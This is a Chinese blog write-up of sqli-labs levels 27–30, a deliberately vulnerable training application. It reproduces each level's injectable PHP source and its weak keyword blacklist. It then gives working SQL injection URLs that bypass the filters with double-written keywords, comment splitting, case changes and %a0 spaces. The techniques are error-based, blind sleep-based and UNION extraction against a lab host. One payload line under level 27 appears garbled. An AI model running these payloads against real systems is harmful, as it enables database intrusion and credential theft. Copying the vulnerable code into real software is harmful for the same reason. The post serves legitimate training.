sqli-labs Less 27 -> sqli-labs Less 30

  1. 前言
  2. 正文

前言

今天从sqli-labs第27关撸到了30关,emmm。还真多
Webh_C_ykHFh_C_yF4SjUjebh_C_ybVH8_P_94Obxpg1fMg4buDb1xuMKObU4bODKOfx1h_C_yGWxJ.jpg

正文

首先先看代码:
27关代码

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-27 Trick with SELECT & UNION</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:40px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

// take the variables 
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    //fiddling with comments
    $id= blacklist($id);
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;

// connectivity 
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
          echo "<font size='5' color= '#99FF00'>";    
          echo 'Your Login name:'. $row['username'];
          echo "<br>";
          echo 'Your Password:' .$row['password'];
          echo "</font>";
      }
    else 
    {
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";  
    }
}
    else { echo "Please input the ID as parameter with numeric value";}




function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
$id= preg_replace('/[--]/',"", $id);        //Strip out --.
$id= preg_replace('/[#]/',"", $id);            //Strip out #.
$id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.
$id= preg_replace('/select/m',"", $id);        //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.
$id= preg_replace('/union/s',"", $id);        //Strip out union
$id= preg_replace('/select/s',"", $id);        //Strip out select
$id= preg_replace('/UNION/s',"", $id);        //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id);        //Strip out SELECT
$id= preg_replace('/Union/s',"", $id);        //Strip out Union
$id= preg_replace('/Select/s',"", $id);        //Strip out select
return $id;
}



?>
</font> </div></br></br></br><center>
<img src="../images/Less-27.jpg" />
</br>
</br>
</br>
<img src="../images/Less-27-1.jpg" />
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
echo "Hint: Your Input is Filtered with following result: ".$hint;
?>
</font> 
</center>
</body>
</html>

union和select都过滤掉了,这里有两个办法可以绕过

1.双写被过滤的
2.用/**/切割关键字,由于/**/会被匹配到然后替换为空

1 payload :ununionion%a0seselectlect
2 payload:un/**/ion/**/se/**/lect

Less-27 Trick with SELECT & UNION),0x7e),1)|%271)

kMa05d.png

第27a,代码如下:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-27 Trick with SELECT & UNION</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:40px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

// take the variables 
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    //fiddling with comments
    $id= blacklist($id);
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;
    $id = '"' .$id. '"';

// connectivity 
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
          echo "<font size='5' color= '#99FF00'>";    
          echo 'Your Login name:'. $row['username'];
          echo "<br>";
          echo 'Your Password:' .$row['password'];
          echo "</font>";
      }
    else 
    {
        echo '<font color= "#FFFF00">';
        //print_r(mysql_error());
        echo "</font>";  
    }
}
    else { echo "Please input the ID as parameter with numeric value";}




function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
$id= preg_replace('/[--]/',"", $id);        //Strip out --.
$id= preg_replace('/[#]/',"", $id);            //Strip out #.
$id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.
$id= preg_replace('/select/m',"", $id);        //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.
$id= preg_replace('/union/s',"", $id);        //Strip out union
$id= preg_replace('/select/s',"", $id);        //Strip out select
$id= preg_replace('/UNION/s',"", $id);        //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id);        //Strip out SELECT
$id= preg_replace('/Union/s',"", $id);        //Strip out Union
$id= preg_replace('/Select/s',"", $id);        //Strip out Select
return $id;
}



?>
</font> </div></br></br></br><center>
<img src="../images/Less-27a.jpg" />
</br>
</br>
</br>
<img src="../images/Less-27a-1.jpg" />
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
echo "Hint: Your Input is Filtered with following result: ".$hint;
?>
</font> 
</center>
</body>
</html>

这关和27关一样,只不过把报错输出注释了,用盲注吧

http://35.201.152.114:8000/Less-27a/?id=1%22%a0and%a0sleep(if((length(database())=8),1,4))|%221

kMdCM6.md.png

第28关代码如下:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-28 Trick with SELECT & UNION</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:40px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

// take the variables 
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    //fiddling with comments
    $id= blacklist($id);
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;

// connectivity 
    $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
          echo "<font size='5' color= '#99FF00'>";    
          echo 'Your Login name:'. $row['username'];
          echo "<br>";
          echo 'Your Password:' .$row['password'];
          echo "</font>";
      }
    else 
    {
        echo '<font color= "#FFFF00">';
        //print_r(mysql_error());
        echo "</font>";  
    }
}
    else { echo "Please input the ID as parameter with numeric value";}




function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);                //strip out /*
$id= preg_replace('/[--]/',"", $id);                //Strip out --.
$id= preg_replace('/[#]/',"", $id);                    //Strip out #.
$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
//$id= preg_replace('/select/m',"", $id);                    //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id);        //Strip out UNION & SELECT.
return $id;
}



?>
</font> </div></br></br></br><center>
<img src="../images/Less-28.jpg" />
</br>
</br>
</br>
<img src="../images/Less-28-1.jpg" />
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
echo "Hint: Your Input is Filtered with following result: ".$hint;
?>
</font> 
</center>
</body>
</html>

这个好像是匹配union+select,就是union到select这个地方,绕过方式也一样用 /**/代替

http://35.201.152.114:8000/Less-28/?id=0%27)%a0un/**/ion%a0sel/**/ect%a01,user(),3|(%271

kMddyV.png

第28a关代码如下:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-28a Trick with SELECT & UNION</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:40px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

// take the variables 
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    //fiddling with comments
    $id= blacklist($id);
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;

// connectivity 
    $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
          echo "<font size='5' color= '#99FF00'>";    
          echo 'Your Login name:'. $row['username'];
          echo "<br>";
          echo 'Your Password:' .$row['password'];
          echo "</font>";
      }
    else 
    {
        echo '<font color= "#FFFF00">';
        //print_r(mysql_error());
        echo "</font>";  
    }
}
    else { echo "Please input the ID as parameter with numeric value";}




function blacklist($id)
{
//$id= preg_replace('/[\/\*]/',"", $id);                //strip out /*
//$id= preg_replace('/[--]/',"", $id);                //Strip out --.
//$id= preg_replace('/[#]/',"", $id);                    //Strip out #.
//$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
//$id= preg_replace('/select/m',"", $id);                    //Strip out spaces.
//$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id);        //Strip out spaces.
return $id;
}



?>
</font> </div></br></br></br><center>
<img src="../images/Less-28a.jpg" />
</br>
</br>
</br>
<img src="../images/Less-28a-1.jpg" />
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
echo "Hint: Your Input is Filtered with following result: ".$hint;
?>
</font> 
</center>
</body>
</html>

这里把一些过滤去掉了,也就是说无法用/**/了= =,不过不慌

他这里只剩下匹配union+select这里的union和select大小写绕过中间的空格用%a0代替
http://35.201.152.114:8000/Less-28a/?id=0%27)%a0uNion%a0sELECT%a01,database(),3|(%271

kMwZ0U.png

第29关代码如下:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-29 Protection with WAF</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:40px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
//disable error reporting
error_reporting(0);

// take the variables 
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    $qs = $_SERVER['QUERY_STRING'];
    $hint=$qs;

// connectivity 
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
          echo "<font size='5' color= '#99FF00'>";    
          echo 'Your Login name:'. $row['username'];
          echo "<br>";
          echo 'Your Password:' .$row['password'];
          echo "</font>";
      }
    else 
    {
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";  
    }
}
    else { echo "Please input the ID as parameter with numeric value";}







?>
</font> </div></br></br></br><center>
<img src="../images/Less-29.jpg" />
</br>
</br>
</br>
<img src="../images/Less-29-1.jpg" />
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
echo "Hint: The Query String you input is: ".$hint;
?>
</font> 
</center>
</body>
</html>

这关我搞不明白为什么没过滤= =。。。,直接带走

http://35.201.152.114:8000/Less-29/?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20user()),0x7e),1)|%271

kM0VgI.md.png

30关代码如下:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-30</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:40px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

//disable error reporting
error_reporting(0);

// take the variables 
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    $qs = $_SERVER['QUERY_STRING'];
    $hint=$qs;
    $id = '"' .$id. '"';

// connectivity 
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
          echo "<font size='5' color= '#99FF00'>";    
          echo 'Your Login name:'. $row['username'];
          echo "<br>";
          echo 'Your Password:' .$row['password'];
          echo "</font>";
      }
    else 
    {
        echo '<font color= "#FFFF00">';
        //print_r(mysql_error());
        echo "</font>";  
    }
}
    else { echo "Please input the ID as parameter with numeric value";}



?>
</font> </div></br></br></br><center>
<img src="../images/Less-30.jpg" />
</br>
</br>
</br>
<img src="../images/Less-30-1.jpg" />
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
echo "Hint: The Query String you input is: ".$hint;
?>
</font> 
</center>
</body>
</html>

也是没过滤。。。。带走

http://35.201.152.114:8000/Less-30/?id=0%22union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=0x7573657273%20limit%200,1%20--+

kM0DPJ.md.png

转载请声明:转自422926799.github.io


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:sqli-labs Less 27 -> sqli-labs Less 30

本文作者:九世

发布时间:2019-01-28, 20:09:10

最后更新:2019-04-19, 20:36:16

原始链接:http://422926799.github.io/posts/178a3f65.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录